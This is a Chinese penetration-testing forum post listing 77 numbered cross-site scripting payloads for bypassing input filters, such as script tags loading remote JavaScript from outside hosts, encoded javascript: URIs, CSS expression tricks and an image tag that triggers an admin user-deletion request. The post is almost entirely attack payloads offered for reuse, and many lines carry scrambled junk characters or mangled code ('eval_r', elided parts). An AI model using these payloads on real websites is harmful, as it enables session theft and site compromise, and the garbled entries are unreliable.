中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。! T/ Q! a2 c$ v" n1 S3 ^: K( ?
# ~  ?' q# s0 |! \( M) Y
(1)普通的XSS JavaScript注入' Z, x, ]) m! x/ Y3 c) A9 P7 k; H; M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) b7 k1 h; I/ [% [: c
/ ]  A" s* s6 E5 k  N (2)IMG标签XSS使用JavaScript命令
. i: m" }$ Q4 g+ i1 Z" s3 ^ <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* N6 u. W+ c' `" J; X8 i1 ^$ C

- s9 U7 b, b4 x2 U4 C6 g (3)IMG标签无分号无引号
* m  p7 _6 S9 U5 q <IMG SRC=javascript:alert(‘XSS’)>
8 }4 P9 M# F) t) @3 @4 {, n" a6 B
(4)IMG标签大小写不敏感
! U; T6 Q7 ~# l! j) v( D1 O1 ~4 s <IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 g8 H9 n; i( l8 v  G- T0 V& O

. W: E" w0 Y8 w' v. S (5)HTML编码(必须有分号)
2 w2 o' x" b9 H% l, O. l5 ~% w( M <IMG SRC=javascript:alert(“XSS”)>
, L- N, k: \6 K- l( f( o7 j4 R& X8 @9 p- q3 x
(6)修正缺陷IMG标签
  o3 U  c" {7 K: [5 A5 [( R <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ B" `# j. ^" l9 G
* J. z/ E% ~2 p
(7)formCharCode标签(计算器)
( [1 M6 t" ^. r1 N0 |! s <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
: {1 E1 u8 w) P9 \5 K% A) W( k! V$ i7 b9 l& Q* w- t: Y1 Y
(8)UTF-8的Unicode编码(计算器)9 |: x9 Z: }& Q; z' ~7 i
<IMG SRC=jav..省略..S')>
0 e& p1 n1 _/ d# Z: s/ Q
# r3 b% q& [. s" B' G) z (9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 K! c+ }7 U' V4 `! c( |
<IMG SRC=jav..省略..S')>
$ P2 X9 y$ R0 o. m: B/ o& j- s' n+ M/ O( J* x, \  |# \5 a
(10)十六进制编码也是没有分号(计算器)9 |/ g$ H: |5 A1 Q# j  c
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>4 D3 q# S& t- U) `0 S( L
& q2 F+ P8 c; H) u: j
(11)嵌入式标签,将Javascript分开% e0 O$ u( A: P! E
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 D) Y! O, D4 A
3 x8 _1 F- Z5 `
(12)嵌入式编码标签,将Javascript分开" k2 C! c! j: q* A" H  M% l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& |8 ]. L5 J7 @3 ^' n: j4 {, q
$ Z) e- O8 e7 x8 W: q6 H- o (13)嵌入式换行符7 x( `0 z, y+ K1 Z2 g3 q9 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' ~6 k, V5 Z2 b& I$ i) \
" x% `5 j# O+ p- A! [$ q2 {6 E/ m (14)嵌入式回车$ v7 h1 U8 }5 T4 F! \0 J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 A# [' ~- p1 j; o" I3 j
& p% x/ u1 X8 P' ? (15)嵌入式多行注入JavaScript,这是XSS极端的例子
* Y3 A; b1 j1 J7 A. C' X! z <IMG SRC=”javascript:alert(‘XSS‘)”>
( |' F0 D2 x0 ^
% w: a8 C: z3 T" ~* L- y, h, {5 v& W (16)解决限制字符(要求同页面)
* S7 F' D  Z5 S, f* M9 A <script>z=’document.’</script>) D0 O8 g8 L" ]- k$ y! |" C
<script>z=z+’write(“‘</script>
& c- r. N1 S6 X) u( V  n <script>z=z+’<script’</script>
  F* V3 d7 U; a <script>z=z+’ src=ht’</script>4 M1 j9 D  j& f1 v5 V: v
<script>z=z+’tp://ww’</script>
( H; j/ r1 m& v <script>z=z+’w.shell’</script>/ H. ^3 }( a) C' e5 q% u
<script>z=z+’.net/1.’</script>+ ]2 u, v; h% X0 j
<script>z=z+’js></sc’</script>" x1 |' X1 m! n2 D
<script>z=z+’ript>”)’</script>
' [4 ~- ~- R9 t) f, U* f <script>eval_r(z)</script>
& D) S1 c' w, e9 H' _3 V; f9 Y8 N( `" c
(17)空字符
2 m( `; ^6 r& ^" h$ X perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out* j/ v7 ?% Y. I! I

4 f. r5 H8 M1 F1 g (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 s" P$ E/ B+ }& b  L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 `  h* ]: g& i! k$ W' }, n  Z
' E; J! }4 u+ l$ \5 ^# _
(19)Spaces和meta前的IMG标签
; Z/ h4 K% J: C% g7 c! f, B7 B8 P: y# y <IMG SRC=”   javascript:alert(‘XSS’);”>
, t: |% K7 u8 q% d- M/ t0 E. j% S" l! `
(20)Non-alpha-non-digit XSS
; M# z( y3 j2 j. L% ~ <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! C3 j6 O/ q5 H
: b$ j2 J' ?, D8 S (21)Non-alpha-non-digit XSS to 2
. `! g. U+ v0 `1 p2 \1 v2 N1 g# ^+ L <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. ^; q7 J& X7 S0 I+ d6 U8 K/ n# u- q/ L7 ?& W' m
(22)Non-alpha-non-digit XSS to 3
. E7 {5 S3 @+ `5 i  @) D7 N$ \: X <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% L+ Z4 y0 w$ n1 X  G

( B- P- c  e8 g  Z8 V% S' n (23)双开括号
+ v4 B, D# s, u0 R" \) E  I! s9 B7 B <<SCRIPT>alert(“XSS”);//<</SCRIPT>: ~4 M" Z. p  O! s: P1 ~  l6 \
  i: o- B  A1 H, g/ L
(24)无结束脚本标记(仅火狐等浏览器)
/ q1 \3 ?- M# o5 ?% G5 s, ~ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; o) O! B" t! a% n  X8 q& P/ @# a6 E6 U8 O
(25)无结束脚本标记2& O% R7 l# m$ q* \, {* j
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 P4 x8 T' G" j& e
: q( [- |" T  |: ^3 U6 f (26)半开的HTML/JavaScript XSS
' ^" k" x* A$ S4 O7 U6 e9 B- {, u <IMG SRC=”javascript:alert(‘XSS’)”
0 h0 u9 m" k$ u3 u. q" H  S3 Y3 ?
! q# S! ?- u" L$ k (27)双开角括号
8 g( i+ w4 s& M <iframe src=http://3w.org/XSS.html <! p% V! W) J+ {& p& q
1 C3 r; W" g# o
(28)无单引号 双引号 分号
7 B7 O; J, m3 w% w$ ?/ r <SCRIPT>a=/XSS/$ X4 J" W0 m( Q" E* d5 Q# q0 j
alert(a.source)</SCRIPT>
5 M% F1 I  ?# M; |2 f- B; F8 G0 ~, s
(29)换码过滤的JavaScript) @) L% q5 K1 e, G" R1 O
\”;alert(‘XSS’);//8 b: }# T2 T* t, l" p7 }
5 Y% S! A, ]+ E
(30)结束Title标签9 t* V6 \  ?4 W) P( m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* m) ?/ A+ ^) k  ~

3 y, ]+ h* W* |, Y* }- p (31)Input Image
' A: e, R7 T1 ]. \ <INPUT SRC=”javascript:alert(‘XSS’);”>, e% @: a3 B' V

% {+ U6 |2 o" f3 d" c0 E" Q (32)BODY Image
" e- m! r5 E* ^8 ?* @* Q0 L! M <BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 d, k  x( y( ~: U

' w( H: S( i- A- b3 y1 f- c (33)BODY标签
+ v' Q( l0 z" ?% \$ i/ w+ t+ Q <BODY(‘XSS’)>$ a( O: g% _5 R/ T: A9 p

" M+ e" k8 O& n9 c1 B (34)IMG Dynsrc+ ^/ k# z5 J$ z0 b$ J0 v: r
<IMG DYNSRC=”javascript:alert(‘XSS’)”>  t1 x+ x, ?2 R; L0 L$ H
' [( ?5 m- w8 O5 D/ _% o
(35)IMG Lowsrc. R9 O2 c& O8 x6 H
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
7 }' d  j) a% ]/ S& s9 B4 s0 k" d$ S! u5 H  b/ X
(36)BGSOUND+ P- ]$ c% B0 }
<BGSOUND SRC=”javascript:alert(‘XSS’);”>% q, G0 A2 e7 r$ O+ T

5 z; s) C) `# L) v% K3 u+ ` (37)STYLE sheet8 W" o* P$ z3 `5 P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
( I0 v! i5 V- b! N+ Q) Q6 V# v" J4 r+ [2 H
(38)远程样式表
) g4 P5 k& a- c) Q- E3 C <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! Y' B! C/ U! U; v
% x1 Z- {" [$ Q5 F6 P5 H; M. S$ m (39)List-style-image(列表式)
: t. f+ [4 o  L8 I# J5 f <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 n+ J! J- M; a8 {( u$ s# J5 z  o0 m5 q; V
(40)IMG VBscript
2 {: H4 k6 \1 V4 `( I% u& x* b! e <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
0 l5 K4 L" C% X9 M0 S1 R5 a7 i6 {5 E1 |! e
(41)META链接url
( y4 w+ s5 u7 D) G6 c$ O <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>9 V1 ~, `+ m) @9 x. t% A# G
/ M2 L: ], S5 N2 i% L0 z
(42)Iframe
$ I- p/ R& P3 R+ @% \. o' |  O, m <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 O, }5 U' B+ a. k4 L9 n, ]4 D+ i4 n3 i  K$ y$ z( J6 b$ S
(43)Frame0 ^7 f9 R0 }: p, s" m0 ^
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>7 H+ P7 n/ m: J) v

3 f$ I1 z" c' v (44)Table
4 Q* S2 _  _5 U9 N4 L' \ <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 `( b) i, Q3 a6 D9 d) H
8 V. |# p* g5 O# A; `
(45)TD
4 U* \+ C  P/ J  P4 E <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 z  Y1 I& M, i; j0 L
; B3 S7 E2 e" p8 f' q2 V9 x (46)DIV background-image1 g, I2 R' N7 V/ g' @0 Z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- I. d6 v7 M. P, A# [5 j+ f' X% @6 o# J3 z
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). f0 a. D9 R% t/ i' a- x7 ~6 P( l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 P! U* {8 [! O5 }1 F- I% J6 \" p5 `
" j# @0 `; H! u0 f# \5 c5 o+ p3 C# @ (48)DIV expression8 k7 y3 Z2 a. U  W3 P" F7 P% W
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>) x! H9 k/ D3 r3 i: H/ ]; D, N/ @9 O
$ {* W5 Y( n) Y: j/ |$ `; m
(49)STYLE属性分拆表达. k" G: N/ R  M: p7 M
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ z4 l/ q- f" E; t$ |# D! S! U
) W+ U0 C" j# I8 s
(50)匿名STYLE(组成:开角号和一个字母开头)
3 l9 B/ E# \: s8 v0 l4 D' i6 m <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ J' y9 t8 Q0 c
9 F2 v8 J, j% y; X (51)STYLE background-image
& P- {; ?" X5 |  F% c <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
# F" _7 v6 L! J' g1 o( N* b
  F, a+ }1 e& | (52)IMG STYLE方式7 W: n+ s# g9 B( [. n' I
exppression(alert(“XSS”))’>+ s) i6 B, ]' F7 f

/ d7 j" d5 \0 m9 q (53)STYLE background6 s9 r) J3 c1 k, W+ Q: R
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# J. k! u* b+ f: a+ t' [3 W
4 q- m+ h! k* K9 R' `* y (54)BASE
. Y' }+ }. ~4 a6 q <BASE HREF=”javascript:alert(‘XSS’);//”>
+ K* D- O/ {" d8 U) _
( F. A3 w1 ~" D0 j (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 D: N! o6 ?) n5 o" _
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 d& ^1 I: C  l* s6 R; V% D

" N( x: ~: D" t2 v/ P (56)在flash中使用ActionScrpt可以混进你XSS的代码
% e% e7 z  J! |( t8 X" s a=”get”;! N" V; u; K! A) W: J( u" m
b=”URL(\”";
, G0 e1 q/ h% Y4 v' Y c=”javascript:”;
! h1 s* G$ ~8 f* l/ i% n2 ]1 j: T d=”alert(‘XSS’);\”)”;
* R) |( U; j! B! E) z eval_r(a+b+c+d);. K2 b) B- M, B
, w& p4 j- {: v9 F% I" E
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& p! `4 M) S/ s  z" Y. x
<HTML xmlns:xss>9 z( a* Z0 M: D9 H; p9 _3 R+ S" [
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, a$ _( C1 I/ \/ G
<xss:xss>XSS</xss:xss>0 P, M+ K; G4 {, N1 r
</HTML>
( [+ O/ f. \: L4 |# N- |" |& X. Z. |
2 H; g  f; [, X% a( q (58)如果过滤了你的JS你可以在图片里添加JS代码来利用% |- e7 |, S" [' v3 F$ I+ w! v3 j
<SCRIPT SRC=””></SCRIPT>) z" a+ M2 Z+ Z/ H) R; u, M7 d

4 [9 g( u) V' n  x0 } (59)IMG嵌入式命令,可执行任意命令$ ^5 b" V: J3 m
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
, {, S) T9 C  x, W( s2 A0 R% C; F$ d" x6 m2 ]5 M5 C2 \
(60)IMG嵌入式命令(a.jpg在同服务器)/ T9 l3 h8 H# [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( t3 o) J& H' t$ G7 {( R0 d$ U# Q- T" O9 o1 O$ ?2 e7 Y: w
(61)绕符号过滤
7 ]$ y) j- C3 H1 e6 k2 B+ \ <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>8 q/ s; x( \' g
3 p9 l+ \- w: d1 i) @5 K/ ~
(62)
4 G8 X1 ~6 R+ B' k <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>  d0 |- j% ?: R5 h$ X4 m0 A

3 g. j' k5 R; w9 X. x. ^; Q+ z (63)
( o0 q+ e. ^  l <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
  k' `$ B1 |* F1 k; l
+ I; }+ ^  |& G: p1 [) j8 W (64)& X, T1 w9 ?* B4 T! R3 f0 b
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>. J3 u! n# d& o4 H
4 p- s" s, e: E! M
(65)
/ B! ~, `' J+ k, \+ o* B  ] <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
7 r" X7 K7 w* _+ I& C* O6 ]$ y+ N+ q+ F- H  |- u" ^7 r
(66)6 u. M! r/ c1 `5 [
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ ~8 v4 e5 e3 K$ n" N# r) h0 }
& a0 X* ^7 h% B
(67)
0 \- }6 T. A4 s3 r3 m( R9 E1 Q <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 a* ?7 I$ t. W* p# b, O1 m7 {
(68)URL绕行5 j% x6 ^2 F& C# T3 A
<A HREF=”http://127.0.0.1/”>XSS</A>: ]6 A- x& }3 V; Z- r$ r

* _3 M5 q; N9 }) l; @' ^' a (69)URL编码; o4 y  @: ^* @' I# x1 z
<A HREF=”http://3w.org”>XSS</A>
2 Y  ?7 V4 j4 E2 ]7 n0 C
% D0 m" z% X  ?. q) O5 h* F( ` (70)IP十进制- o5 R" Q+ j% H& i8 ]
<A HREF=”http://3232235521″>XSS</A>8 x1 U% ~5 F( t7 K- L+ Y" Z6 Y

0 k8 B) ?2 ^; f0 F% | (71)IP十六进制8 Q4 T+ U$ n+ d
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# O) D$ O) V- g5 G& E) f" s3 h% \5 a: Y' N) {
(72)IP八进制5 r3 k+ q- x: F8 |1 @
<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ V' h/ s/ I3 ?, C. E3 m

( W7 F. [1 x) @ (73)混合编码
8 b' H- R6 k. G! m( b; S# S <A HREF=”h
3 W7 N: D& r) O tt p://6 6.000146.0×7.147/”">XSS</A>3 q8 L6 G/ }5 f4 g$ U: \
% P; z' k! E! M( b% K
(74)节省[http:]4 w" [/ o, a5 [* o/ _6 K$ U
<A HREF=”//www.google.com/”>XSS</A>
9 u& q- d; I* M, _/ Y# z1 H* |& H
(75)节省[www]
) p1 J/ b! ~, J. L! P7 k! G) d <A HREF=”http://google.com/”>XSS</A>
- Y! Q. ]; z4 L3 W4 Y1 \4 H* O9 S. W( s, y* r6 x8 L. Y) |
(76)绝对点绝对DNS6 g$ w: P* c7 @, m* m& M. E
<A HREF=”http://www.google.com./”>XSS</A>8 l( m" \0 W7 ~: v

+ S( {: l3 S" D7 ]5 x (77)javascript链接  J" I. D  G; W& G
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2